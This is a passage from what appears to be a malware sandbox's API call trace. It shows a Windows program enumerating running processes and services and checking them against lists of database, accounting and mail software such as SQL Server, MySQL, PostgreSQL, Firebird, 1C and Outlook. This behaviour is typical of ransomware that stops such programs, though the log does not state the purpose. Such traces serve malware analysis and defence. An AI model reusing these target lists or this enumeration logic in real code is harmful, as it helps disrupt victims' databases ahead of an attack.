(lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0252.854] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0252.854] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0252.854] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.855] lstrlenW (lpString="wininit.exe") returned 11 [0252.855] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0252.855] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0252.855] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0252.855] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0252.855] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0252.855] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0252.855] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0252.855] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.855] lstrlenW (lpString="csrss.exe") returned 9 [0252.855] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0252.855] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0252.855] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0252.855] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0252.855] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0252.855] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0252.855] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0252.855] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.856] lstrlenW (lpString="winlogon.exe") returned 12 [0252.856] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0252.856] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0252.856] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0252.856] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0252.856] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0252.856] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0252.856] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0252.856] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.856] lstrlenW (lpString="services.exe") returned 12 [0252.856] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0252.856] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0252.856] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0252.856] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0252.856] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0252.856] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0252.856] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0252.856] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.857] lstrlenW (lpString="lsass.exe") returned 9 [0252.857] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0252.857] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0252.857] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0252.857] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0252.857] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0252.857] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0252.857] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0252.857] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0252.857] lstrlenW (lpString="lsm.exe") returned 7 [0252.857] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0252.857] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0252.857] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0252.857] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0252.857] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0252.857] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0252.857] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0252.857] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.858] lstrlenW (lpString="svchost.exe") returned 11 [0252.858] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0252.858] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.858] lstrlenW (lpString="svchost.exe") returned 11 [0252.858] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0252.858] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0252.858] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.859] lstrlenW (lpString="svchost.exe") returned 11 [0252.859] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0252.859] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.859] lstrlenW (lpString="svchost.exe") returned 11 [0252.859] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.859] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.860] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.860] lstrlenW (lpString="svchost.exe") returned 11 [0252.860] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.860] lstrlenW (lpString="audiodg.exe") returned 11 [0252.860] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.860] lstrlenW (lpString="svchost.exe") returned 11 [0252.860] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.861] lstrlenW (lpString="svchost.exe") returned 11 [0252.861] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0252.861] lstrlenW (lpString="userinit.exe") returned 12 [0252.861] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.861] lstrlenW (lpString="dwm.exe") returned 7 [0252.861] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.862] lstrlenW (lpString="explorer.exe") returned 12 [0252.862] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.862] lstrlenW (lpString="spoolsv.exe") returned 11 [0252.862] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.862] lstrlenW (lpString="taskhost.exe") returned 12 [0252.862] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.862] lstrlenW (lpString="svchost.exe") returned 11 [0252.862] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0252.863] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0252.863] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0252.863] lstrlenW (lpString="reader_sl.exe") returned 13 [0252.863] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0252.863] lstrlenW (lpString="dllhost.exe") returned 11 [0252.863] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0252.864] CloseHandle (hObject=0x3ac) returned 1 [0252.864] Sleep (dwMilliseconds=0x1f4) [0253.454] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea380 [0253.591] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0253.592] GetLastError () returned 0xea [0253.592] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0253.592] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0253.592] CloseServiceHandle (hSCObject=0x47ea380) returned 1 [0253.592] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0253.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0253.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0253.592] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0253.592] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0253.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0253.592] lstrlenW (lpString="AudioSrv") returned 8 [0253.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0253.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0253.592] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0253.592] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0253.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0253.592] lstrlenW (lpString="BFE") returned 3 [0253.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0253.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0253.592] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0253.592] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0253.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0253.593] lstrlenW (lpString="CryptSvc") returned 8 [0253.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0253.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0253.593] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0253.593] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0253.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0253.593] lstrlenW (lpString="CscService") returned 10 [0253.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0253.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0253.593] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0253.593] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0253.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0253.593] lstrlenW (lpString="DcomLaunch") returned 10 [0253.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0253.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0253.593] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0253.593] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0253.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0253.593] lstrlenW (lpString="Dhcp") returned 4 [0253.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0253.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0253.593] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0253.593] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0253.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0253.593] lstrlenW (lpString="Dnscache") returned 8 [0253.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0253.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0253.593] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0253.593] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0253.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0253.593] lstrlenW (lpString="DPS") returned 3 [0253.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0253.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0253.594] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0253.594] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0253.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0253.594] lstrlenW (lpString="eventlog") returned 8 [0253.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0253.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0253.594] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0253.594] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0253.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0253.594] lstrlenW (lpString="EventSystem") returned 11 [0253.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0253.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0253.594] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0253.595] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0253.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0253.595] lstrlenW (lpString="gpsvc") returned 5 [0253.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0253.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0253.595] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0253.595] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0253.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0253.595] lstrlenW (lpString="LanmanWorkstation") returned 17 [0253.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0253.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0253.595] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0253.595] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0253.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0253.595] lstrlenW (lpString="lmhosts") returned 7 [0253.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0253.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0253.595] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0253.595] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0253.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0253.595] lstrlenW (lpString="MMCSS") returned 5 [0253.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0253.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0253.595] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0253.595] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0253.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0253.595] lstrlenW (lpString="MpsSvc") returned 6 [0253.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0253.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0253.595] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0253.595] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0253.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0253.596] lstrlenW (lpString="NlaSvc") returned 6 [0253.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0253.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0253.596] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0253.596] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0253.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0253.596] lstrlenW (lpString="nsi") returned 3 [0253.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0253.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0253.596] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0253.596] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0253.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0253.596] lstrlenW (lpString="PcaSvc") returned 6 [0253.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0253.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0253.596] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0253.596] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0253.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0253.596] lstrlenW (lpString="PlugPlay") returned 8 [0253.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0253.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0253.596] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0253.596] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0253.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0253.596] lstrlenW (lpString="Power") returned 5 [0253.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0253.596] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0253.596] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0253.596] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0253.596] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0253.596] lstrlenW (lpString="ProfSvc") returned 7 [0253.596] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0253.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0253.597] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0253.597] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0253.597] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0253.597] lstrlenW (lpString="RpcEptMapper") returned 12 [0253.597] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0253.597] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0253.597] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0253.597] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0253.597] lstrcmpiW 